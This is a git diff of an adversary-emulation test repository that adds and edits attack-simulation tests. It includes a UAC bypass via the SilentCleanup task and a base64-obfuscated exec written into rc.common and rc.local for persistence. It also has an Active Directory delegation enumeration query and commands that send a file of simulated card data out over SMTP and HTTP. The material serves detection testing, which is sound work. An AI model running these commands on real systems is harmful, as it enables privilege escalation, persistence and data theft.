| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -40,7 +40,7 @@
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index af7d14dd..9500a007 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10120,6 +10120,31 @@ privilege-escalation:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1574.012:
technique:
external_references:
@@ -15364,6 +15389,48 @@ privilege-escalation:
'
elevation_required: true
name: bash
+ - name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: 'Modify rc.common
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+ && sudo rm $origfilename;fi
+
+'
+ - name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: 'Modify rc.local
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+ sudo rm $origfilename;fi
+
+'
T1547.007:
technique:
created: '2020-01-24T18:15:06.641Z'
@@ -19315,6 +19382,31 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1218.003:
technique:
external_references:
@@ -28887,11 +28979,9 @@ defense-evasion:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
- Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
- -SmtpServer #{smtp_server}"
+ command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+ -Attachments #{input_file} -SmtpServer #{smtp_server}
'
name: powershell
@@ -28911,9 +29001,8 @@ defense-evasion:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
'
name: powershell
@@ -42988,6 +43077,48 @@ persistence:
'
elevation_required: true
name: bash
+ - name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: 'Modify rc.common
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+ && sudo rm $origfilename;fi
+
+'
+ - name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: 'Modify rc.local
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+ sudo rm $origfilename;fi
+
+'
T1542.004:
technique:
created: '2020-10-20T00:05:48.790Z'
@@ -49382,6 +49513,49 @@ discovery:
'
name: command_prompt
+ - name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+ -Server #{domain}
+
+'
T1069.002:
technique:
external_references:
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 74a09cdb..9f34ff74 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
```
@@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
```
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 4288d3ae..7210e5af 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -109,7 +109,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
- input_file:
+ input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
@@ -147,8 +146,7 @@ atomic_tests:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md
index 994659fb..5e258a38 100644
--- a/atomics/T1037.004/T1037.004.md
+++ b/atomics/T1037.004/T1037.004.md
@@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
+
+
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+
+
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```
+
+
+
+
+
diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index 8b664b82..6004b8b4 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -15,3 +15,42 @@ atomic_tests:
elevation_required: true
name: bash
+
+- name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: |
+ Modify rc.common
+
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: |
+ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+
+- name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: |
+ Modify rc.local
+
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: |
+ origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 2b80197a..f39060c1 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain
@@ -344,4 +346,59 @@ net user administrator /domain
+
+
+
+## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
+Attackers may attempt to query for computer objects with the UserAccountControl property
+'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain FQDN | String | contoso.com|
+| uac_prop | UAC Property to search | String | 524288|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+}
+Catch {
+ exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index d8f3a3f4..61822ffb 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -69,7 +69,7 @@ atomic_tests:
name: powershell
- name: Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
supported_platforms:
@@ -93,7 +93,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
supported_platforms:
@@ -117,7 +117,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -141,7 +141,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -173,3 +173,44 @@ atomic_tests:
command: |
net user administrator /domain
name: command_prompt
+
+- name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: |
+ PowerShell ActiveDirectory Module must be installed
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 98064122..597dc756 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia
- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)
+- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
+
+
+
+## Atomic Test #9 - Bypass UAC using SilentCleanup task
+Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+For example, we can set the windir registry kye to: "cmd /k REM "
+
+And forcefully run SilentCleanup task:
+
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat|
+
+
